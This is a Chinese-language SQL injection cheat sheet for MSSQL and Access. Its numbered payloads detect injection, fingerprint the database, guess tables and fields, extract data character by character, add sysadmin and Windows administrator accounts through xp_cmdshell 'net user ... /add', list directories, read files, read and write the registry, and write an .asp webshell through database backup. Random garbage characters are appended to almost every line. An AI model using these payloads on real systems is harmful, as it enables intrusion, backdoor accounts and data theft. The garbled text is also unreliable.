1.判断是否有注入;and 1=1 ;and 1=2 �\+cQiN b@
2.初步判断是否是mssql ;and user>0 61��jDI^�:
�zoUW��}O�
3.注入参数是字符'and [查询条件] and ''=' m���#8}!u&
Bm~>w`�1wK
4.搜索时没过滤参数的'and [查询条件] and '%25'=' qIb�(uF@l"
��fC~WuG�3
5.判断数据库系统 �w`!Y�r:dU
/f0_mi,�bD
;and (select count(*) from sysobjects)>0 mssql �j�g�%D
G2
{qOSs,+=�L
;and (select count(*) from msysobjects)>0 access ZQ��~?����
Or�_��9KX2
Ch7eUTq�A@
3�F��X`�dZ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 F},JP'�\X
#jDO?Y� Sa
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��|/p��^e
)'f�IrBT��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 (TnYUyFP`�
"QiU�uD�=
9.(1)猜字段的ascii值(access) y��M�\��1n
L�`�Qi�u�@
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 '�}�!dRpx�
Aq"�;z.gi+
(2)猜字段的ascii值(mssql) 8,[�'��q~z
BA-n+WCWJ
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 .�(`�u�'G=
$1�?YVA7�
10.测试权限结构(mssql) E����)Hp.�
CdE��J/G�:
):�.]4n{L�
c*ytUI��*�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �{ifYr(|p`
��%/sf#8^m
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- nY�~�CAo/:
7J �0�!v�q
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �i�5_g��z>
��T�cGxm7T
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �aEL6-[�'(
ueq����R@i
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hP��E��K�@
.W�ta��U��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Rr�R�CT.+E
<X;y�
4lPZ
;and 1=(select IS_MEMBER('db_owner'));-- M)|}V�n;!
l'o'q7&�=z
X1��" `0r3
9��D
0ujup
11.添加mssql和系统的帐户 �T?%����F�
/5wvXk�|@�
;exec master.dbo.sp_addlogin username;-- !5{t�1 oJ�
;exec master.dbo.sp_password null,username,password;-- 0}�w>8L7i{
.|o7YTcR�:
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- `aSz"�4�Wd
&�JP-M=\�n
;exec master.dbo.xp_cmdshell 'net user username password ?=
ulf�GrY
yf��aXScbE
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %��q:�V���
Va
!HcG1^:
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �J6f;��dF^
#_Tce��q�5
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �IJ=~�hBI
Nf3K�z�#!B
]Oe#S"-O�o
�Z�!hDT��T
12.(1)遍历目录 8"p>_K��=
�M�%6�{A+(
;create table dirs(paths varchar(100), id int) Kk#8r+�,�
B:Sz�CC.B�
;insert dirs exec master.dbo.xp_dirtree 'c:\' IY :iGn8R�
j@ =n|�cq�
;and (select top 1 paths from dirs)>0 �T}�fo:aB}
3+(�F�q5I
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �#t�{?WkO[
)vo �PH)!�
�*^QfTKN��
<0Q`:�'\.>
(2)遍历目录 3Vt-]DG�X�
t�n�:9��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �S .��1~�#
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 44�b��'�40
x�{IOn;>R�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �j�!jZ�J�D
|�\elM[G"g
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K����b{���
fr:RiOPn��
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 R3.t�kFZq]
191O(��H
bJGT�^N�@�
DBV��e69/S
13.mssql中的存储过程 jc�evpKkRG
�>#xpg&�2x
xp_regenumvalues 注册表根键, 子键 W;��u~�}k<
\@tt�$ m�%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 4Mnne'���7
6%�O"�����
xp_regread 根键,子键,键值名 :� �h��-�N
7��GE�.>h5
;exec xp_regread y%�3Yr?]�
|�'1[\<MM3
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 r;}kw(�ukC
1<�Z�v�Hv
xp_regwrite 根键,子键, 值名, 值类型, 值 V�b0hlJ�b
Qm �;ip� E
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 y{5�ZC~Z<!
�.4.zy]�I�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 id�GM%Faur
p�Sc�<3OI�
xp_regdeletevalue 根键,子键,值名 { \�r{$<s�
kG\�+f�>XQ
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 O@?�?
NF6G
k�\1q Jr��
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 n ��T\�W|
��j�C��<<S
uFG]8pj2V1
3Pkzzyk_|D
14.mssql的backup创建webshell E^Q|�v4�5d
Hza�{"�I*^
use model �=U3�!D;XP
H@�5:��x�8
create table cmd(str image); �^;Ap-2W�w
> �: \lDz�
insert into cmd(str) values (''); �(g�4.bbEm
�9C�3q4.$D
backup database model to disk='c:\l.asp'; ��R\1#)3e0
C$
n�T&06o
�R:Z{,R+
wD}[X�E?�S
15.mssql内置函数 >wz-p�
n�D
rhwY5�FD�?
;and (select @@version)>0 获得Windows的版本号 H?UmHww��E
��LW0't}
z
;and user_name()='dbo' 判断当前系统的连接用户是不是sa !��x|OgvJ�
)O2giVq7[0
;and (select user_name())>0 爆当前系统的连接用户 �DX���4uTD
|"vq�M)V�$
;and (select db_name())>0 得到当前连接的数据库 B�,,��f$h!
e�p>S$a*|�
�v�vFXdHP�
mgh,)=2cE(
16.简洁的webshell [6)`w���i
l+y/�Mq^QB
use model }4��� 5|��
b�gL`FW i3
create table cmd(str image); �z(�K[�i?&
h+}�`mi�
insert into cmd(str) values (''); @T�>)fKC�g
pZ�%/;sxYa
backup database model to disk='g:\wwwtest\l.asp';
